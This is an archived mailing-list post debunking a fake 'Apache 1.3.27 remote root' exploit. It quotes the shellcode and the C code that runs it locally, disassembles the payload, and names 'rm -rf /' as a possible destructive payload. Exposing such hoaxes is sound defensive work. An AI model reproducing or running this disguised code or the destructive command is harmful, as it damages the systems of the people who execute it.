lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <265000-220036520184833972@M2W036.mail2web.com>
From: mattmurphy at kc.rr.com (mattmurphy@...rr.com)
Subject: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST)

>I am posting this as a member of koec.  The koec take no responsibility
>for damages caused by this software, compile and use at your own risk.
>By the way, the koec make you all look like a bunch of fuckin' schoolgirls.
>
>WHITEH8.

Haha!  That's really quite funny.  We'll see in just a moment, why that
disclaimer is necessary.

>- --BEGIN KOEC-APACHE.C--
>
>/* :: PRIVATE - DO NOT DISTRIBUTE ::
> * Apache/1.3.27 - Remote Root Exploit
> * Knights of the Eastern Calculus (info@...c.org)
> */

Is anybody else laughing about the "DO NOT DISTRIBUTE" banner in the
publicly released code?  Deja vu of the "ElectronicSouls" hoax.

>static char shellcode[] = {
>"\x31\xdb\x31\xc0\x31\xd2\xb2\x18\x68\x20\x3f\x21"
>"\x0a\x68\x54\x52\x31\x58\x68\x65\x20\x4d\x34\x68"
>"\x73\x20\x54\x68\x68\x61\x74\x20\x69\x68\x2d\x2d"
>"\x57\x68\x89\xe1\xb0\x04\xcd\x80\xb8\x02\x00\x00"
>"\x00\xcd\x80\xeb\xf7\x00\xcb\xad\x80\x00\x00\x02"
>"\x73\x21\x54\x68\x68\x61\x74\x21\x69\x68\x2d\x2d"
>"\x0a\x67\x54\x52\x31\x57\x67\x65\x20\x4d\x34\x67"
>"\x67\x68\x89\xe1\xb2\x04\xcd\x80\xb8\x02\x80\x00"
>"\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80\xcc"
>"\x68\x47\x47\x47\x47\x89\xe3\x31\xc0\x50\x50\x50"
>"\x04\x53\x50\x50\x31\xd2\x31\xc9\xb1\x80\xc1\xe1"
>"\xc0\xb0\x85\xcd\x80\x72\x02\x09\xca\xff\x44\x24"
>"\x04\x20\x75\xe9\x31\xc0\x89\x44\x24\x04\xc6\x44"
>"\x64\x24\x08\x89\x44\x24\x0c\x89\x44\x24\x10\x89"
>"\x54\x24\x18\x8b\x54\x24\x18\x89\x14\x24\x31\xc0"
>};

Let's analyze this payload:

31 DB             xorl  %ebx, %ebx
C0                xorl  %eax, %eax
31 D2             xorl  %edx, %edx
B2 18             movb  %dl,$0x18
68 20 3F 21 0A    pushl $0x0A213F20
68 54 52 31 58    pushl $0x58315254
68 65 20 4D 34    pushl $0x344D2065
68 73 20 54 68    pushl $0x68542073
68 61 74 20 69    pushl $0x69207461
68 2D 2D 57 68    pushl $0x68572D2D
89 E1             movl  %ecx, %esp
B0 04             movb  %al, $0x04
CD 80             int   $0x80

sys_write(stdin, "--What is The M4TR1X ?!\n", 24);

B8 02 00 00 00    movl  %eax, $0x00000002
CD 80             int   $0x80

sys_write(stderr, "--What is The M4TR1X ?!\n", 24);

EB F7             jmp   +2

As you can see, the only relevant bytes of the code are the first 52.  The
code below it fails to work, so simply replacing the "\xeb\xf7" with
"\x90\x90" will cause the exploit to crash the target with a SIGSEGV.

Let's look at this memory allocation routine -- how funny.

[snip]
    buffer = (char *) malloc(512 + 1024 + 100);
    if (buffer == NULL) {
        printf("Not enough memory\n");
        exit(1);
    }
    memcpy(&buffer[512 - strlen(shellcode)], shellcode,
           strlen(shellcode));
    buffer[512 + 1024] = ';';
    buffer[512 + 1024 + 1] = '\0';
    void(*b)()=(void*)shellcode;b();
[huge snip]

It malloc's things oddly -- 512+1024+100 -- appearantly, our exploit
authors couldn't do basic addition.  512+1024+100 = 1636.  What's funnier,
is that the shellcode is placed into the middle of the buffer, so if the
shellcode ever gets sent, memory data is leaked to the target.  Secondly is
of course the fact that the shellcode is launched by the last line here. 
It is an infinitively looped payload that prints out "--What is The M4TR1X
?!" until the program is killed by a CTRL+C or a 'kill' command from
another console.

I'd like to add that "koec@...hmail.com" is in violation of the list
charter, namely the section that states the following:

"Attachments may be included if relevant or necessary (e.g. PGP or S/MIME
signatures, proof-of-concept code, etc) but must not be active (in the case
of a worm, for example) or malicious to the recipient."

While the code being distributed was not technically an "attachment", it
was malicious to the recipient, as it was designed to waste CPU cycles on
an infinite loop, and served no other purpose.  I'd also like to add that
list readers really should pay attention to the section of the charter that
states:

"Members are reminded that due to the open nature of the list, they should
use discretion in executing any tools or code distributed via this list."

Had KOEC intended to cause serious damage, that shellcode could have been
written to execute:

rm -rf /

it is advised that users at least drop the privileges of suspect code with
'su' -- never run suspect files as highly-privileged users.

--------------------------------------------------------------------
mail2web - Check your email from the web at
http://mail2web.com/ .



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ